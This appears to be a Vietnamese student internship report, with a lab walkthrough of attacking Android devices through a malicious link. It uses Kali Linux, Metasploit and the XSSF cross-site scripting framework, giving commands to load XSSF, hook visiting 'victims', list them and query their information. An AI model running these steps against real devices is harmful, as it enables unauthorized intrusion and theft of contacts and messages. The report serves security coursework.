tuan3
TRANSCRIPT
![Page 1: Tuan3](https://reader036.vdocuments.net/reader036/viewer/2022071710/55a9ff931a28abd5578b4764/html5/thumbnails/1.jpg)
Sinh viên thực hiện : NGUYỄN QUỐC VƯƠNG . Lớp CNTT . Ca sáng 3 – 5 - 7
Báo cáo thực tập
Đề tài 5 : Nghiên cứu các Trojan ,Malware cho phép đánh cắp dữ liệu như danh sách contact ,
tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC
- Đầu tiên , khởi động Kali Linux -> khởi mở Terminal
- Lần lượt thực hiện 3 lệnh để cập nhật Framework
msfupdate
cd /opt/metasploit/apps/pro/msf3
svn export http://xssf.googlecode.com/svn/trunk/ ./ --force
- Thực hiện lệnh “msfconsole” để khởi động Metasploit
- Tiếp tục gõ lệnh “load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose” để
thực hiện XSSF.
![Page 2: Tuan3](https://reader036.vdocuments.net/reader036/viewer/2022071710/55a9ff931a28abd5578b4764/html5/thumbnails/2.jpg)
- Thực hiện lệnh “xssf_urls” để nhận được các đường dẫn web như của XSSF Server
, XSSF test page , XSSF logs page …. Sau đó 1 máy nạn nhân bất kì truy cập vào
đường dẫn web XSSF test page :
![Page 3: Tuan3](https://reader036.vdocuments.net/reader036/viewer/2022071710/55a9ff931a28abd5578b4764/html5/thumbnails/3.jpg)
- Ta được kết quả như hình . Đồng thời máy tấn công cũng nhận được thông báo :
New victim registered with id : 1
- Để kiểm tra số lượng nạn nhân truy cập vào đường dẫn ta dùng lệnh “xssf_victims”
lúc này sẽ xuất hiện lượng máy nạn nhân truy cập phải
![Page 4: Tuan3](https://reader036.vdocuments.net/reader036/viewer/2022071710/55a9ff931a28abd5578b4764/html5/thumbnails/4.jpg)
- Bây giờ máy tấn công có thể xem thông tin và thực hiện khai thác dữ liệu về nạn
nhân bằng cách sử dụng lệnh :
Để kiểm tra thông tin về nạn nhân :
xssf_information <ID máy nạn nhân>
![Page 5: Tuan3](https://reader036.vdocuments.net/reader036/viewer/2022071710/55a9ff931a28abd5578b4764/html5/thumbnails/5.jpg)
Để kiểm tra các quyền
Search auxiliary/xssf
Gửi thông báo xssf đến máy nạn nhân
Use auxililary/xssf/public/misc/alert
Run